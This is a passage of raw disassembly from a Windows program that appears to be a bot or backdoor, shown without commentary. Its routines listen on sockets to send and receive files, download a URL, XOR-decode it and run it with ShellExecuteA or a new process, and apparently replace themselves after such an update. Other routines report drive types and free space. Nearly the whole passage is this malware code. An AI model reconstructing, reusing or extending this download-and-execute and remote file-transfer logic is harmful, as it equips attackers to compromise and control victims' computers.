lea eax, [ebp+var_11B4]
push eax
call sub_40C4F7
pop ecx
push ebx
call dword_441450 ; closesocket
push [ebp+var_10]
call sub_417174
pop ecx
push esi
nop
call near ptr 7C80C058h
loc_40C9F1: ; CODE XREF: sub_40C8F3+A3�j
push 64h
nop
call near ptr 7C802442h
xor edi, edi
mov esi, 1000h
loc_40CA00: ; CODE XREF: sub_40C8F3+168�j
push esi
lea eax, [ebp+var_11B4]
push edi
push eax
call sub_417430
add esp, 0Ch
lea eax, [ebp+var_11B4]
push edi
push esi
push eax
push ebx
call dword_4413D0 ; recv
test eax, eax
jle short loc_40CA5D
lea eax, [ebp+var_11B4]
push offset asc_4285AC ; "\n"
push eax
call sub_417A10
lea eax, [ebp+var_11B4]
push eax
call sub_40B82D
add esp, 0Ch
test eax, eax
jz short loc_40CA5D
push 64h
nop
call near ptr 7C802442h
push 7
call sub_4170A0
test eax, eax
pop ecx
jnz short loc_40CA00
loc_40CA5D: ; CODE XREF: sub_40C8F3+130�j
; sub_40C8F3+154�j
lea eax, [ebp+var_11B4]
push offset dword_42D760
push eax
call sub_4173AC
cmp [ebp+var_8], edi
pop ecx
pop ecx
jnz short loc_40CA90
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_40DC10
add esp, 14h
loc_40CA90: ; CODE XREF: sub_40C8F3+180�j
lea eax, [ebp+var_11B4]
push eax
call sub_40C4F7
pop ecx
push ebx
call dword_441450 ; closesocket
push [ebp+var_10]
call sub_417174
pop ecx
push edi
nop
call near ptr 7C80C058h
sub_40C8F3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CAB4 proc near ; DATA XREF: sub_40F6F1+4CFB�o
var_A04 = byte ptr -0A04h
var_604 = byte ptr -604h
var_500 = dword ptr -500h
var_4FC = dword ptr -4FCh
var_3FC = byte ptr -3FCh
var_1FC = dword ptr -1FCh
var_1F8 = dword ptr -1F8h
var_1E0 = byte ptr -1E0h
var_DC = byte ptr -0DCh
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A04h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1FC]
rep movsd
push 1
xor esi, esi
pop ebx
mov [ebp+var_10], esi
push esi
push ebx
push 2
mov [eax+1B0h], ebx
mov [ebp+var_C], esi
mov [ebp+var_20], esi
call dword_441438 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_18], edi
jnz short loc_40CB02
push offset dword_42D968
jmp loc_40CCBB
; ---------------------------------------------------------------------------
loc_40CB02: ; CODE XREF: sub_40CAB4+42�j
push 10h
lea eax, [ebp+var_30]
push esi
push eax
call sub_417430
add esp, 0Ch
mov [ebp+var_30], 2
push esi
call dword_4413B8 ; ntohs
mov word ptr [ebp+var_2E], ax
lea eax, [ebp+var_30]
push 10h
push eax
push edi
mov [ebp+var_2E+2], esi
call dword_4413E4 ; bind
test eax, eax
jz short loc_40CB40
push offset dword_42D934
jmp loc_40CCBB
; ---------------------------------------------------------------------------
loc_40CB40: ; CODE XREF: sub_40CAB4+80�j
lea eax, [ebp+var_1C]
mov [ebp+var_1C], 10h
push eax
lea eax, [ebp+var_30]
push eax
push edi
call dword_44135C ; getsockname
push [ebp+var_2E]
call dword_4412F4 ; ntohs
mov [ebp+var_4], eax
lea eax, [ebp+var_1E0]
push eax
mov [ebp+arg_0], esi
call sub_417AF0
pop ecx
loc_40CB72: ; CODE XREF: sub_40CAB4+EF�j
mov ecx, [ebp+arg_0]
mov al, [ebp+ecx+var_1E0]
cmp al, 20h
jnz short loc_40CB85
push 5Fh
pop eax
jmp short loc_40CB88
; ---------------------------------------------------------------------------
loc_40CB85: ; CODE XREF: sub_40CAB4+CA�j
movsx eax, al
loc_40CB88: ; CODE XREF: sub_40CAB4+CF�j
mov [ebp+ecx+var_604], al
lea eax, [ebp+var_1E0]
inc ecx
push eax
mov [ebp+arg_0], ecx
call sub_417AF0
cmp [ebp+arg_0], eax
pop ecx
jbe short loc_40CB72
push ebx
push edi
call dword_4413E0 ; listen
test eax, eax
jz short loc_40CBBB
push offset dword_42D7E4
jmp loc_40CCBB
; ---------------------------------------------------------------------------
loc_40CBBB: ; CODE XREF: sub_40CAB4+FB�j
push esi
push esi
push 3
push esi
push ebx
lea eax, [ebp+var_1E0]
push 80000000h
push eax
nop
call near ptr 7C801A24h
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_40CBE5
push offset dword_42D904
jmp loc_40CCBB
; ---------------------------------------------------------------------------
loc_40CBE5: ; CODE XREF: sub_40CAB4+125�j
push esi
push eax
nop
call near ptr 7C810A77h
mov [ebp+arg_0], eax
push eax
movzx eax, word ptr [ebp+var_4]
push eax
push [ebp+var_1FC]
call sub_40AFAB
pop ecx
push eax
call dword_4413F8 ; inet_addr
push eax
call dword_4413B4 ; ntohl
push eax
lea eax, [ebp+var_1E0]
push eax
lea eax, [ebp+var_3FC]
push offset dword_42D8EC
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_3FC]
push esi
push eax
lea eax, [ebp+var_DC]
push eax
push [ebp+var_1FC]
call sub_40DC10
add esp, 2Ch
lea eax, [ebp+var_38]
mov [ebp+var_38], 3Ch
mov [ebp+var_34], esi
push eax
push esi
lea eax, [ebp+var_500]
push esi
push eax
push esi
mov [ebp+var_4FC], edi
mov [ebp+var_500], ebx
call dword_4413A0 ; select
test eax, eax
jg short loc_40CC95
push esi
lea eax, [ebp+var_DC]
push [ebp+var_54]
push offset dword_42D8C4
push eax
push [ebp+var_1FC]
call sub_40DC10
jmp loc_40CDB9
; ---------------------------------------------------------------------------
loc_40CC95: ; CODE XREF: sub_40CAB4+1BF�j
lea eax, [ebp+var_14]
mov [ebp+var_14], 10h
push eax
lea eax, [ebp+var_48]
push eax
push edi
call dword_44144C ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_1F8], eax
jnz short loc_40CCCE
push offset dword_42D890
loc_40CCBB: ; CODE XREF: sub_40CAB4+49�j
; sub_40CAB4+87�j ...
lea eax, [ebp+var_3FC]
push eax
call sub_4173AC
pop ecx
pop ecx
jmp loc_40CDBC
; ---------------------------------------------------------------------------
loc_40CCCE: ; CODE XREF: sub_40CAB4+200�j
push edi
call dword_441450 ; closesocket
cmp [ebp+arg_0], esi
jz loc_40CD80
mov edi, 400h
loc_40CCE3: ; CODE XREF: sub_40CAB4+2C3�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
cmp eax, edi
jge short loc_40CCF0
mov [ebp+var_4], eax
loc_40CCF0: ; CODE XREF: sub_40CAB4+237�j
push edi
lea eax, [ebp+var_A04]
push esi
push eax
call sub_417430
mov eax, [ebp+arg_0]
add esp, 0Ch
neg eax
push 2
push esi
push eax
push [ebp+var_8]
nop
call near ptr 7C810B8Eh
lea eax, [ebp+var_20]
push esi
push eax
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_8]
nop
call near ptr 7C80180Eh
push esi
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_1F8]
call dword_441408 ; send
mov [ebp+var_4], eax
push esi
cdq
add [ebp+var_10], eax
lea eax, [ebp+var_A04]
push edi
push eax
push [ebp+var_1F8]
adc [ebp+var_C], edx
call dword_4413D0 ; recv
cmp eax, ebx
jl loc_40CE15
mov eax, [ebp+var_4]
cmp eax, ebx
jl loc_40CE15
sub [ebp+arg_0], eax
jnz loc_40CCE3
mov edi, [ebp+var_18]
loc_40CD80: ; CODE XREF: sub_40CAB4+224�j
push [ebp+var_8]
nop
call near ptr 7C809B47h
push [ebp+var_C]
push [ebp+var_10]
call sub_40D5BA
pop ecx
pop ecx
push eax
lea eax, [ebp+var_1E0]
push eax
push [ebp+var_44]
call dword_441444 ; inet_ntoa
push eax
lea eax, [ebp+var_3FC]
push offset dword_42D840
push eax
call sub_4173AC
loc_40CDB9: ; CODE XREF: sub_40CAB4+1DC�j
add esp, 14h
loc_40CDBC: ; CODE XREF: sub_40CAB4+215�j
cmp [ebp+var_50], esi
jnz short loc_40CDE1
push esi
lea eax, [ebp+var_3FC]
push [ebp+var_54]
push eax
lea eax, [ebp+var_DC]
push eax
push [ebp+var_1FC]
call sub_40DC10
add esp, 14h
loc_40CDE1: ; CODE XREF: sub_40CAB4+30B�j
lea eax, [ebp+var_3FC]
push eax
call sub_40C4F7
cmp edi, esi
pop ecx
jbe short loc_40CDF9
push edi
call dword_441450 ; closesocket
loc_40CDF9: ; CODE XREF: sub_40CAB4+33C�j
push [ebp+var_1F8]
call dword_441450 ; closesocket
push [ebp+var_58]
call sub_417174
pop ecx
push esi
nop
call near ptr 7C80C058h
loc_40CE15: ; CODE XREF: sub_40CAB4+2AF�j
; sub_40CAB4+2BA�j
push esi
mov esi, offset dword_42D818
push [ebp+var_54]
lea eax, [ebp+var_DC]
push esi
push eax
push [ebp+var_1FC]
call sub_40DC10
push esi
call sub_40C4F7
add esp, 18h
push [ebp+var_1F8]
call dword_441450 ; closesocket
push [ebp+var_58]
call sub_417174
pop ecx
push ebx
nop
call near ptr 7C80C058h
sub_40CAB4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CE56 proc near ; DATA XREF: sub_40F6F1+7BA�o
var_14C4 = byte ptr -14C4h
var_4C4 = byte ptr -4C4h
var_2C4 = byte ptr -2C4h
var_1C0 = dword ptr -1C0h
var_1B8 = byte ptr -1B8h
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 14C4h
call sub_417B70
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1C0]
rep movsd
push 1
xor ebx, ebx
pop esi
mov [ebp+var_8], ebx
mov [eax+1B0h], esi
lea eax, [ebp+var_2C4]
push 104h
push eax
nop
call near ptr 7C814EEAh
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_2C4]
push offset aSS_2 ; "%s%s"
push eax
call sub_4173AC
add esp, 10h
lea eax, [ebp+var_2C4]
push ebx
push 80h
push 2
push ebx
push esi
push 40000000h
push eax
nop
call near ptr 7C801A24h
cmp eax, 0FFFFFFFFh
jnz short loc_40CEE0
push offset dword_42DA60
jmp short loc_40CF26
; ---------------------------------------------------------------------------
loc_40CEE0: ; CODE XREF: sub_40CE56+81�j
push eax
nop
call near ptr 7C809B47h
lea eax, [ebp+var_2C4]
push offset aAB ; "a+b"
push eax
call sub_41823A
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jnz short loc_40CF08
push offset dword_42DA20
jmp short loc_40CF26
; ---------------------------------------------------------------------------
loc_40CF08: ; CODE XREF: sub_40CE56+A9�j
push [ebp+var_20]
lea eax, [ebp+var_1B8]
push eax
call sub_40C86D
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+arg_0], eax
jnz short loc_40CF39
push offset dword_42D9F0
loc_40CF26: ; CODE XREF: sub_40CE56+88�j
; sub_40CE56+B0�j
lea eax, [ebp+var_4C4]
push eax
call sub_4173AC
pop ecx
pop ecx
jmp loc_40D033
; ---------------------------------------------------------------------------
loc_40CF39: ; CODE XREF: sub_40CE56+C9�j
mov esi, 1000h
loc_40CF3E: ; CODE XREF: sub_40CE56+14E�j
push esi
lea eax, [ebp+var_14C4]
push ebx
push eax
call sub_417430
add esp, 0Ch
lea eax, [ebp+var_14C4]
push ebx
push esi
push eax
push [ebp+arg_0]
call dword_4413D0 ; recv
mov edi, eax
cmp edi, ebx
jz loc_40D005
cmp edi, 0FFFFFFFFh
jz short loc_40CFA6
push [ebp+var_4]
lea eax, [ebp+var_14C4]
push edi
push 1
push eax
call sub_4188AC
add [ebp+var_8], edi
add esp, 10h
push [ebp+var_8]
call dword_4413B4 ; ntohl
mov [ebp+var_C], eax
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push [ebp+arg_0]
call dword_441408 ; send
jmp short loc_40CF3E
; ---------------------------------------------------------------------------
loc_40CFA6: ; CODE XREF: sub_40CE56+118�j
lea eax, [ebp+var_4C4]
push offset dword_42D818
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_4C4]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_1C0]
call sub_40DC10
lea eax, [ebp+var_4C4]
push eax
call sub_40C4F7
push [ebp+var_4]
call sub_4180DC
add esp, 24h
push [ebp+arg_0]
call dword_441450 ; closesocket
push [ebp+var_1C]
call sub_417174
pop ecx
push 1
nop
call near ptr 7C80C058h
loc_40D005: ; CODE XREF: sub_40CE56+10F�j
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_40D5BA
push eax
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_4C4]
push offset dword_42D99C
push eax
call sub_4173AC
add esp, 1Ch
loc_40D033: ; CODE XREF: sub_40CE56+DE�j
cmp [ebp+var_14], ebx
jnz short loc_40D058
push ebx
lea eax, [ebp+var_4C4]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_1C0]
call sub_40DC10
add esp, 14h
loc_40D058: ; CODE XREF: sub_40CE56+1E0�j
lea eax, [ebp+var_4C4]
push eax
call sub_40C4F7
cmp [ebp+var_4], ebx
pop ecx
jz short loc_40D073
push [ebp+var_4]
call sub_4180DC
pop ecx
loc_40D073: ; CODE XREF: sub_40CE56+212�j
cmp [ebp+arg_0], ebx
jbe short loc_40D081
push [ebp+arg_0]
call dword_441450 ; closesocket
loc_40D081: ; CODE XREF: sub_40CE56+220�j
push [ebp+var_1C]
call sub_417174
pop ecx
push ebx
nop
call near ptr 7C80C058h
sub_40CE56 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D091 proc near ; DATA XREF: sub_40F6F1+393F�o
; sub_40F6F1+4062�o
var_590 = qword ptr -590h
var_584 = qword ptr -584h
var_510 = byte ptr -510h
var_310 = dword ptr -310h
var_304 = dword ptr -304h
var_2E4 = dword ptr -2E4h
var_2E0 = word ptr -2E0h
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_248 = byte ptr -248h
var_148 = byte ptr -148h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 510h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0AAh
mov esi, eax
lea edi, [ebp+var_2CC]
push 1
rep movsd
pop edi
xor esi, esi
push esi
mov [eax+2A4h], edi
push esi
push esi
lea eax, [ebp+var_248]
push esi
push eax
push dword_441368
call dword_4412C8 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+var_18], eax
jz loc_40D51D
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_148]
push 40000000h
push eax
nop
call near ptr 7C801A24h
cmp eax, edi
mov [ebp+var_20], eax
jnb short loc_40D158
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_510]
push offset unk_42DCF4
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_40D13B
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40DC10
add esp, 14h
loc_40D13B: ; CODE XREF: sub_40D091+88�j
lea eax, [ebp+var_510]
push eax
call sub_40C4F7
push [ebp+var_48]
call sub_417174
pop ecx
pop ecx
push esi
nop
call near ptr 7C80C058h
loc_40D158: ; CODE XREF: sub_40D091+68�j
xor edi, edi
nop
call near ptr 7C80929Ch
mov ebx, 7D000h
mov dword ptr [ebp+var_8+4], eax
push ebx
call sub_417BEE
pop ecx
mov [ebp+var_1C], eax
loc_40D172: ; CODE XREF: sub_40D091+1B4�j
push 200h
lea eax, [ebp+var_510]
push esi
push eax
call sub_417430
add esp, 0Ch
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_510]
push 200h
push eax
push [ebp+var_18]
call dword_4412D0 ; InternetReadFile
cmp [ebp+var_34], esi
jz short loc_40D1B6
push [ebp+arg_0]
lea eax, [ebp+var_510]
push eax
call sub_40D583
pop ecx
pop ecx
loc_40D1B6: ; CODE XREF: sub_40D091+112�j
lea eax, [ebp+var_24]
push esi
push eax
lea eax, [ebp+var_510]
push [ebp+arg_0]
push eax
push [ebp+var_20]
nop
call near ptr 7C810D87h
cmp edi, ebx
jnb short loc_40D1F4
mov eax, ebx
sub eax, edi
cmp eax, [ebp+arg_0]
jbe short loc_40D1DE
mov eax, [ebp+arg_0]
loc_40D1DE: ; CODE XREF: sub_40D091+148�j
push eax
lea eax, [ebp+var_510]
push eax
mov eax, [ebp+var_1C]
add eax, edi
push eax
call sub_417490
add esp, 0Ch
loc_40D1F4: ; CODE XREF: sub_40D091+13F�j
add edi, [ebp+arg_0]
cmp [ebp+var_3C], esi
jz short loc_40D201
cmp edi, [ebp+var_3C]
ja short loc_40D24B
loc_40D201: ; CODE XREF: sub_40D091+169�j
cmp [ebp+var_44], 1
mov eax, edi
jz short loc_40D21B
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset unk_42DCAC
jmp short loc_40D22B
; ---------------------------------------------------------------------------
loc_40D21B: ; CODE XREF: sub_40D091+176�j
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset unk_42DC6C
loc_40D22B: ; CODE XREF: sub_40D091+188�j
mov eax, [ebp+var_48]
imul eax, 234h
add eax, offset dword_446C10
push eax
call sub_4173AC
add esp, 10h
cmp [ebp+arg_0], esi
ja loc_40D172
loc_40D24B: ; CODE XREF: sub_40D091+16E�j
cmp [ebp+var_3C], esi
mov [ebp+var_14], 1
jz short loc_40D2A0
cmp edi, [ebp+var_3C]
jz short loc_40D2A0
push [ebp+var_3C]
lea eax, [ebp+var_510]
mov [ebp+var_14], esi
push edi
push offset unk_42DC28
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40DC10
lea eax, [ebp+var_510]
push eax
call sub_40C4F7
add esp, 28h
loc_40D2A0: ; CODE XREF: sub_40D091+1C4�j
; sub_40D091+1C9�j
nop
call near ptr 7C80929Ch
sub eax, dword ptr [ebp+var_8+4]
xor edx, edx
mov ecx, 3E8h
push [ebp+var_20]
div ecx
xor edx, edx
mov ecx, eax
mov eax, edi
inc ecx
div ecx
mov ebx, eax
nop
call near ptr 7C809B47h
push [ebp+var_1C]
call sub_417C62
cmp [ebp+var_38], esi
pop ecx
jz short loc_40D32A
lea eax, [ebp+var_148]
push eax
call sub_40C7FB
cmp eax, [ebp+var_38]
pop ecx
jz short loc_40D32A
push [ebp+var_38]
mov [ebp+var_14], esi
push eax
lea eax, [ebp+var_510]
push offset unk_42DBF0
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40DC10
lea eax, [ebp+var_510]
push eax
call sub_40C4F7
add esp, 28h
loc_40D32A: ; CODE XREF: sub_40D091+241�j
; sub_40D091+253�j
cmp [ebp+var_14], esi
jz loc_40D56A
cmp [ebp+var_44], 1
jz loc_40D425
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul dbl_421610
lea eax, [ebp+var_148]
fstp [esp+584h+var_584]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+var_510]
fmul dbl_421610
fstp [esp+590h+var_590]
push offset unk_42DBA8
push eax
call sub_4173AC
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_40D3A5
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40DC10
add esp, 14h
loc_40D3A5: ; CODE XREF: sub_40D091+2F2�j
lea eax, [ebp+var_510]
push eax
call sub_40C4F7
cmp [ebp+var_40], 1
pop ecx
jnz loc_40D56A
push 5
push esi
lea eax, [ebp+var_148]
push esi
push eax
push offset aOpen ; "open"
push esi
call dword_44132C ; ShellExecuteA
cmp [ebp+var_30], esi
jnz loc_40D56A
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_510]
push offset dword_42DB74
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40DC10
lea eax, [ebp+var_510]
push eax
call sub_40C4F7
add esp, 24h
jmp loc_40D56A
; ---------------------------------------------------------------------------
loc_40D425: ; CODE XREF: sub_40D091+2A6�j
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul dbl_421610
lea eax, [ebp+var_148]
fstp [esp+584h+var_584]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+var_510]
fmul dbl_421610
fstp [esp+590h+var_590]
push offset unk_42DB24
push eax
call sub_4173AC
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_40D48D
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40DC10
add esp, 14h
loc_40D48D: ; CODE XREF: sub_40D091+3DA�j
lea eax, [ebp+var_510]
push eax
call sub_40C4F7
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_417430
push 44h
lea eax, [ebp+var_310]
pop edi
push edi
push esi
push eax
call sub_417430
add esp, 1Ch
mov [ebp+var_310], edi
lea eax, [ebp+var_10]
mov [ebp+var_304], offset byte_43C63C
push 1
mov [ebp+var_2E0], si
pop edi
push eax
lea eax, [ebp+var_310]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp+var_148]
push esi
push eax
push esi
mov [ebp+var_2E4], edi
nop
call near ptr 7C802367h
cmp eax, edi
jnz short loc_40D50F
call dword_441318 ; WSACleanup
call sub_40ABB7
push esi
nop
call near ptr 7C81CDDAh
loc_40D50F: ; CODE XREF: sub_40D091+46A�j
lea eax, [ebp+var_148]
push eax
push offset unk_42DADC
jmp short loc_40D529
; ---------------------------------------------------------------------------
loc_40D51D: ; CODE XREF: sub_40D091+45�j
lea eax, [ebp+var_248]
push eax
push offset unk_42DAA0
loc_40D529: ; CODE XREF: sub_40D091+48A�j
lea eax, [ebp+var_510]
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_40D55D
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40DC10
add esp, 14h
loc_40D55D: ; CODE XREF: sub_40D091+4AA�j
lea eax, [ebp+var_510]
push eax
call sub_40C4F7
pop ecx
loc_40D56A: ; CODE XREF: sub_40D091+29C�j
; sub_40D091+325�j ...
push [ebp+var_18]
call dword_4413EC ; InternetCloseHandle
push [ebp+var_48]
call sub_417174
pop ecx
push esi
nop
call near ptr 7C80C058h
sub_40D091 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40D583 proc near ; CODE XREF: sub_40D091+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_40D59F
loc_40D58F: ; CODE XREF: sub_40D583+1A�j
mov dl, byte_42ECF8
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_40D58F
locret_40D59F: ; CODE XREF: sub_40D583+A�j
retn
sub_40D583 endp
; =============== S U B R O U T I N E =======================================
sub_40D5A0 proc near ; CODE XREF: sub_40F6F1+2B56�p
; sub_40F6F1+2CA5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_418DAF
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_40D5A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D5BA proc near ; CODE XREF: sub_4062F7+45D�p
; sub_4062F7+5F9�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h
mov edi, offset dword_44578C
push 0
push edi
call sub_417430
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_40D5DF: ; CODE XREF: sub_40D5BA+5B�j
; sub_40D5BA+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call sub_4189C0
push 0
push 0Ah
push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call sub_418A40
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_40D61D
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_40D5DF
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_40D5DF
; ---------------------------------------------------------------------------
loc_40D61D: ; CODE XREF: sub_40D5BA+4B�j
dec esi
mov eax, edi
loc_40D620: ; CODE XREF: sub_40D5BA+73�j
lea ecx, [ebp+var_38]
cmp esi, ecx
jb short loc_40D62F
mov cl, [esi]
mov [eax], cl
inc eax
dec esi
jmp short loc_40D620
; ---------------------------------------------------------------------------
loc_40D62F: ; CODE XREF: sub_40D5BA+6B�j
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_40D5BA endp
; =============== S U B R O U T I N E =======================================
sub_40D639 proc near ; CODE XREF: sub_40D7E5+51�p
; sub_40D7E5+87�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_441418 ; GetDriveTypeA
sub eax, 0
jz short loc_40D67C
dec eax
jz short loc_40D676
dec eax
dec eax
jz short loc_40D670
dec eax
jz short loc_40D66A
dec eax
jz short loc_40D664
dec eax
jz short loc_40D65E
mov eax, offset word_42D4DC
retn
; ---------------------------------------------------------------------------
loc_40D65E: ; CODE XREF: sub_40D639+1D�j
mov eax, offset off_42DD54
retn
; ---------------------------------------------------------------------------
loc_40D664: ; CODE XREF: sub_40D639+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_40D66A: ; CODE XREF: sub_40D639+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_40D670: ; CODE XREF: sub_40D639+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_40D676: ; CODE XREF: sub_40D639+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_40D67C: ; CODE XREF: sub_40D639+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_40D639 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D682 proc near ; CODE XREF: sub_40D6CA+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, dword_4412B4
test eax, eax
jz short loc_40D6B7
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_40D6B7: ; CODE XREF: sub_40D682+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_40D682 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D6CA proc near ; CODE XREF: sub_40BDAD+1F3�p
; sub_40D7E5+17�p
var_198 = byte ptr -198h
var_118 = byte ptr -118h
